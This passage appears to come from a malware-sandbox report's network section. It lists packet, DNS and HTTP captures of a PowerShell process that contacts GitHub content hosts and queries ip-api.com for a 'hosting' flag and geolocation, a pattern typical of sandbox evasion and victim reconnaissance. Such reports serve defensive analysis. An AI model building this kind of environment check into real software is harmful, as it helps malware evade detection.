                                        Jul 5, 2024 06:27:00.130919933 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.130927086 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.131073952 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.131093979 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.131259918 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.131259918 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.131267071 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.179655075 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.210998058 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211016893 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211081982 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211090088 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211146116 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211247921 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211263895 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211311102 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211317062 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211378098 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211532116 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211548090 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211607933 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211612940 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211661100 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211822987 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211839914 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211899042 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.211904049 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.211951971 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.212007046 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.212022066 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.212095022 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.212100983 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.212220907 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.212255955 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.212270975 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.212322950 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.212327957 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.212388039 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.223711967 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.223726988 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.223834038 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.223839998 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.223896980 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.223927021 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.223942041 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.223994017 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.223999023 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.224030018 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.224055052 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.303828001 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.303850889 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.303946972 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.303972006 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304035902 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304039001 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304049015 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304073095 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304100037 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304104090 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304124117 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304145098 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304400921 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304414988 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304466963 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304471970 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304539919 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304673910 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304692984 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304718971 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304723024 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304745913 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304769993 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.304939032 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.304965019 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.305037975 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.305043936 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.305098057 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.305130959 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.305162907 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.305166960 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.305195093 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.305233002 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.316508055 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.316524029 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.316602945 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.316612005 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.316699028 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.316761971 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.316776991 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.316833019 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.316837072 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.316857100 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.316885948 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.396634102 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.396651983 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.396827936 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.396836996 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.396888971 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.396917105 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.396944046 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.396948099 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.396953106 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.396984100 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397018909 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397131920 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397145987 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397214890 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397219896 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397285938 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397330046 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397344112 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397413015 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397417068 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397466898 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397593021 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397605896 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397674084 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397674084 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397680044 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397735119 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397830963 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397845984 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397906065 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397911072 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.397938967 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.397974014 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.409770966 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.409786940 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.409890890 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.409933090 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.409951925 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.409956932 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.409965992 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.409965992 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.460995913 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.489557028 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.489578962 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.489769936 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.489803076 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.489820004 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.489845991 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.489892006 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.489943027 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.489958048 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490024090 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490029097 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490165949 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490190029 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490226030 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490231991 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490257978 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490696907 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490711927 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490757942 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490766048 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490792990 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490861893 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490880966 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.490940094 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490940094 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.490945101 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.501940966 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.501955032 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.502017975 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.502024889 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.502183914 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.502336979 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.502355099 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.502398014 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.502402067 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.502432108 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.554718018 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.582660913 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.582679987 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.582904100 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.582912922 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.582932949 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.582967997 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.583012104 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.583199978 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.583215952 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.583272934 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.583277941 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.583930969 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.583951950 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.583990097 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.583996058 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584022999 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.584316969 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584331036 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584383011 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.584388971 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584415913 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.584465027 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584492922 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584522963 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.584527969 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.584559917 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.594937086 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.594955921 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.595041990 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.595050097 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.595251083 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.595269918 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.595428944 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.595428944 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.595436096 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.648439884 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.675523043 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.675544024 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.675678015 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.675688028 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.675730944 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.675749063 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.675868034 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.675868034 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.675868034 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.675873995 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.675942898 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.676178932 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.676198959 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.676256895 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.676265001 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.676287889 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.676316977 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.676598072 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.676619053 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.676695108 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.676695108 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.676701069 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.676754951 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.677068949 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677083015 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677144051 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.677148104 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677197933 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.677470922 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677485943 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677542925 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.677544117 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677558899 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677575111 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677597046 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.677643061 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.677647114 CEST44363780185.199.111.133192.168.2.4
                                        Jul 5, 2024 06:27:00.677789927 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:00.678033113 CEST63780443192.168.2.4185.199.111.133
                                        Jul 5, 2024 06:27:20.098114967 CEST8063771208.95.112.1192.168.2.4
                                        Jul 5, 2024 06:27:20.098201036 CEST6377180192.168.2.4208.95.112.1

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 5, 2024 06:26:06.514014959 CEST4960253192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:06.520781994 CEST53496021.1.1.1192.168.2.4
                                        Jul 5, 2024 06:26:29.608944893 CEST6419953192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:29.616512060 CEST53641991.1.1.1192.168.2.4
                                        Jul 5, 2024 06:26:29.780062914 CEST5357339162.159.36.2192.168.2.4
                                        Jul 5, 2024 06:26:30.253716946 CEST5208253192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:30.261429071 CEST53520821.1.1.1192.168.2.4
                                        Jul 5, 2024 06:26:30.937925100 CEST5194853192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:30.945338964 CEST53519481.1.1.1192.168.2.4
                                        Jul 5, 2024 06:26:37.838207006 CEST5625153192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:37.845974922 CEST53562511.1.1.1192.168.2.4
                                        Jul 5, 2024 06:26:38.954514980 CEST5300953192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:38.961018085 CEST53530091.1.1.1192.168.2.4
                                        Jul 5, 2024 06:26:57.050343990 CEST5796553192.168.2.41.1.1.1
                                        Jul 5, 2024 06:26:57.056972027 CEST53579651.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jul 5, 2024 06:26:06.514014959 CEST192.168.2.41.1.1.10xe6d4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:29.608944893 CEST192.168.2.41.1.1.10xb90fStandard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:30.253716946 CEST192.168.2.41.1.1.10x357dStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                        Jul 5, 2024 06:26:30.937925100 CEST192.168.2.41.1.1.10x1330Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:37.838207006 CEST192.168.2.41.1.1.10xb741Standard query (0)github.comA (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:38.954514980 CEST192.168.2.41.1.1.10x92bdStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:57.050343990 CEST192.168.2.41.1.1.10x2ae1Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jul 5, 2024 06:26:06.520781994 CEST1.1.1.1192.168.2.40xe6d4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:06.520781994 CEST1.1.1.1192.168.2.40xe6d4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:06.520781994 CEST1.1.1.1192.168.2.40xe6d4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:06.520781994 CEST1.1.1.1192.168.2.40xe6d4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:29.616512060 CEST1.1.1.1192.168.2.40xb90fNo error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:29.616512060 CEST1.1.1.1192.168.2.40xb90fNo error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:30.261429071 CEST1.1.1.1192.168.2.40x357dName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                        Jul 5, 2024 06:26:30.945338964 CEST1.1.1.1192.168.2.40x1330No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:37.845974922 CEST1.1.1.1192.168.2.40xb741No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:38.961018085 CEST1.1.1.1192.168.2.40x92bdNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:38.961018085 CEST1.1.1.1192.168.2.40x92bdNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:38.961018085 CEST1.1.1.1192.168.2.40x92bdNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:38.961018085 CEST1.1.1.1192.168.2.40x92bdNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:57.056972027 CEST1.1.1.1192.168.2.40x2ae1No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:57.056972027 CEST1.1.1.1192.168.2.40x2ae1No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:57.056972027 CEST1.1.1.1192.168.2.40x2ae1No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                        Jul 5, 2024 06:26:57.056972027 CEST1.1.1.1192.168.2.40x2ae1No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • raw.githubusercontent.com
                                        • www.cloudflare.com
                                        • github.com
                                        • objects.githubusercontent.com
                                        • ip-api.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.463771208.95.112.1807296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Jul 5, 2024 06:26:30.950978994 CEST175OUTGET /line/?fields=hosting HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: ip-api.com
                                        Connection: Keep-Alive
                                        Jul 5, 2024 06:26:31.419663906 CEST175INHTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:31 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false
                                        Jul 5, 2024 06:26:31.422158003 CEST135OUTGET /json HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: ip-api.com
                                        Jul 5, 2024 06:26:31.525300026 CEST482INHTTP/1.1 200 OK
                                        Date: Fri, 05 Jul 2024 04:26:31 GMT
                                        Content-Type: application/json; charset=utf-8
                                        Content-Length: 305
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 59
                                        X-Rl: 43
